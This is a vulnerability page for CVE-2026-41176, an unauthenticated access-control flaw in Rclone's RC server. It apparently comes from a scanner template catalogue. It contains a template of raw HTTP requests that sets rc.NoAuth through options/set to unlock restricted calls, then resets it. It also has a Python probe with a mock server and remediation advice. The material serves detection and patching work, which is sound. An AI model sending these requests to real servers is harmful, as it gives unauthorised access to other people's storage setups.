Rclone RC - Broken Access Control
CVE-2026-41176
Verified
Description
Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability: the RC endpoint `options/set` can be called without authentication and mutates the global runtime configuration, which lets unauthenticated attackers reach sensitive administrative functions. Exploitation requires an RC server that was started without global HTTP authentication. The template below demonstrates the issue by setting `rc.NoAuth` to `true` through `options/set`, which lifts the restriction that otherwise returns HTTP 403 for calls such as `config/listremotes`, re-checking that call, and then resetting `rc.NoAuth` to `false`.
Severity
Critical
CVSS Score
9.2
Exploit Probability
17%
Affected Product
rclone
Published Date
April 23, 2026
Template Author
theamanrawat
CVE-2026-41176.yaml
id: CVE-2026-41176

info:
  name: Rclone RC - Broken Access Control
  author: theamanrawat
  severity: critical
  description: |
    Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability caused by unauthenticated access to the RC endpoint `options/set` allowing mutation of global runtime configuration, letting unauthenticated attackers access sensitive administrative functions, exploit requires RC server started without global HTTP authentication.
  impact: |
    Unauthenticated attackers can access sensitive administrative functions, potentially leading to full control over the RC server configuration and operations.
  remediation: |
    Upgrade to version 1.73.5 or later.
  reference:
    - https://github.com/rclone/rclone/security/advisories/GHSA-25qr-6mpr-f7qx
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41176
  classification:
    cvss-score: 9.2
    cve-id: CVE-2026-41176
    epss-score: 0.16737
    epss-percentile: 0.95024
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 4
    vendor: rclone
    product: rclone
  tags: cve,cve2026,rclone,auth-bypass,rce,unauth,vkev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /config/listremotes HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 403'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        POST /options/set HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"rc":{"NoAuth":true}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{}")'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        POST /config/listremotes HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

      - |
        POST /options/set HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"rc":{"NoAuth":false}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "remotes")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a0047304502204d1bb79744c55b94102c33a6f4c49dcfe03d8f4fedd7a5b62acbc40f1c03597802210089f333fd97552c051627679e6dbc0165a3ac27ef239a8988e87ca967767b724e:922c64590222798bb761d5b6d8e72950
Score
9.2
CVSS Metrics
CVE ID:
cve-2026-41176
CWE ID:
cwe-306
Remediation Steps
Upgrade to version 1.73.5 or later. Because exploitation requires an RC server running without global HTTP authentication, also start `rclone rcd` with credentials (`--rc-user`/`--rc-pass`) rather than relying on the default unauthenticated mode, and keep `--rc-addr` bound to localhost unless remote access is actually required.
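The same four-request flow as the template, written as a standalone Python probe with a constructed mock of `rclone rcd` so it can be run offline. This is an added example, not rclone's code and not the template author's; the mock's responses (a 403 JSON error for `config/listremotes` until `rc.NoAuth` is set, `{}` from `options/set`, a `remotes` list afterwards) are modelled on the matchers in the template above, and the "patched" mode, where `options/set` itself is refused with 403, is our assumption of how a fixed server behaves rather than something the page states. The probe always attempts to reset `rc.NoAuth` to `false` so a real target is not left more exposed than it was found.

```python
"""Added example: reproduce the options/set -> rc.NoAuth flow against a
constructed mock of rclone rcd and restore the setting afterwards."""
import json
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen


def rc_post(base_url, method, params):
    """POST one JSON RC call and return (status, content_type, body_text)."""
    req = Request(f"{base_url}/{method}", data=json.dumps(params).encode(),
                  headers={"Content-Type": "application/json"}, method="POST")
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status, resp.headers.get("Content-Type", ""), resp.read().decode()
    except HTTPError as err:  # 403 etc. are real answers here, not transport failures
        return err.code, err.headers.get("Content-Type", ""), err.read().decode()


def probe_rclone_rc(base_url):
    """Same four requests as the template: confirm the 403, flip rc.NoAuth,
    re-check, and always try to flip rc.NoAuth back."""
    result = {"restricted": False, "noauth_set": False, "vulnerable": False, "restored": None}
    status, ctype, _ = rc_post(base_url, "config/listremotes", {})
    # An rcd started without --rc-user/--rc-pass answers 403 to authenticated-only calls.
    if not (status == 403 and "application/json" in ctype):
        return result
    result["restricted"] = True
    try:
        status, ctype, body = rc_post(base_url, "options/set", {"rc": {"NoAuth": True}})
        if not (status == 200 and "{}" in body and "application/json" in ctype):
            return result
        result["noauth_set"] = True
        status, ctype, body = rc_post(base_url, "config/listremotes", {})
        result["vulnerable"] = status == 200 and "remotes" in body and "application/json" in ctype
    finally:
        if result["noauth_set"]:  # cleanup: put the server back the way we found it
            try:
                status, _, _ = rc_post(base_url, "options/set", {"rc": {"NoAuth": False}})
                result["restored"] = status == 200
            except OSError:
                result["restored"] = False
    return result


class MockRcd(BaseHTTPRequestHandler):
    """Constructed stand-in for an rclone rcd started with no HTTP auth.
    Unpatched: options/set is reachable and toggles rc.NoAuth. 'patched' is an
    assumption about the fix: options/set itself is refused with 403."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        params = json.loads(self.rfile.read(length) or b"{}")
        state = self.server  # per-server mutable state set in start_mock()
        if self.path == "/options/set":
            if state.patched:
                return self._send(403, {"error": "authentication required"})
            state.no_auth = bool(params.get("rc", {}).get("NoAuth", state.no_auth))
            return self._send(200, {})
        if self.path == "/config/listremotes":
            if not state.no_auth:
                return self._send(403, {"error": "authentication required"})
            return self._send(200, {"remotes": ["backup"]})
        return self._send(404, {"error": "not found"})

    def _send(self, code, obj):
        data = json.dumps(obj).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_mock(patched=False):
    """Start the mock on a free loopback port; returns (server, base_url)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), MockRcd)
    srv.no_auth = False
    srv.patched = patched
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


if __name__ == "__main__":
    for patched in (False, True):
        srv, url = start_mock(patched)
        print("patched" if patched else "unpatched", probe_rclone_rc(url))
        srv.shutdown()
```

Against a real target, call `probe_rclone_rc("http://host:5572")` (5572 is rclone's default `--rc-addr` port); a result with `restricted` true but `noauth_set` false means the server enforces the default restriction and does not let `options/set` through, which is what the upgrade should produce.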